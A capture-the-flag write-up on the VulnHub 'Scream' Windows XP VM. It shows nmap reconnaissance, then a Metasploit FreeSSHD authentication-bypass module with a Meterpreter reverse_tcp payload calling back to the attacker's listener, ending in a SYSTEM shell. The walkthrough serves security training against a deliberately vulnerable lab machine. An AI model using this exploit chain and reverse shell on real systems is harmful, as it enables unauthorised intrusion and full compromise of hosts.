published on in writeup
tags: scream

Scream - Method 1 (Short/Easy)

Scream is a vulnerable VM running Windows XP SP2, created with the Scream VulnInjector from VulnHub.

Whilst doing this challenge, I found two methods of gaining SYSTEM. The first was very straight-forward and rather short, which is why I also chose to publish the longer / harder method.

Nmap

[email protected]:~# nmap -n -sV -A 192.168.127.130
 
PORT   STATE SERVICE VERSION
21/tcp open  ftp     WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp              0 May 15 18:15 bin
| drwxr-xr-x 1 ftp ftp              0 May 15 18:15 log
|_drwxr-xr-x 1 ftp ftp              0 May 15 18:15 root
|_ftp-bounce: bounce working!
22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 2c:23:77:67:d3:e0:ae:2a:a8:01:a4:9e:54:97:db:2c (DSA)
|_  1024 fa:11:a5:3d:63:95:4a:ae:3e:16:49:2f:bb:4b:f1:de (RSA)
23/tcp open  domain  ISC BIND login
|_dns-nsid: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Tinyweb httpd 1.93
|_http-methods: No Allow or Public header in OPTIONS response (status code 403)
|_http-title: The Scream - Edvard Munch

Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows 2000 SP4, Microsoft Windows XP SP2 or SP3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

I Googled the SSH Service Banner and the very first result mentioned a ‘FreeSSHD Remote Authentication Bypass Zeroday Exploit’, for which a Metapsloit Module was available.

Metasploit

Fire up msfconsole

msf > use exploit/windows/ssh/freesshd_authbypass  
msf exploit(freesshd_authbypass) > set RHOST 192.168.127.130
msf exploit(freesshd_authbypass) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(freesshd_authbypass) > set LHOST 192.168.127.127
msf exploit(freesshd_authbypass) > set LPORT 443
msf exploit(freesshd_authbypass) > show options
 
Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                                              Required  Description
   ----       ---------------                                              --------  -----------
   RHOST      192.168.127.130                                              yes       The target address
   RPORT      22                                                           yes       The target port
   USERNAME                                                                no        A specific username to try
   USER_FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt  yes       File containing usernames, one per line
 
Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.127.127  yes       The listen address
   LPORT     443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Freesshd <= 1.2.6 / Windows (Universal)
 
msf exploit(freesshd_authbypass) > exploit
 
[*] Started reverse handler on 192.168.127.127:443
[*] Trying username '4Dgifts'
[*] Trying username 'EZsetup'
[*] Trying username 'OutOfBox'
[*] Trying username 'ROOT'
[*] Trying username 'adm'
[*] Trying username 'admin'
[*] Uploading payload, this may take several minutes...
[*] Sending stage (769536 bytes) to 192.168.127.130
[*] Meterpreter session 1 opened (192.168.127.127:443 -> 192.168.127.130:1041)
 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM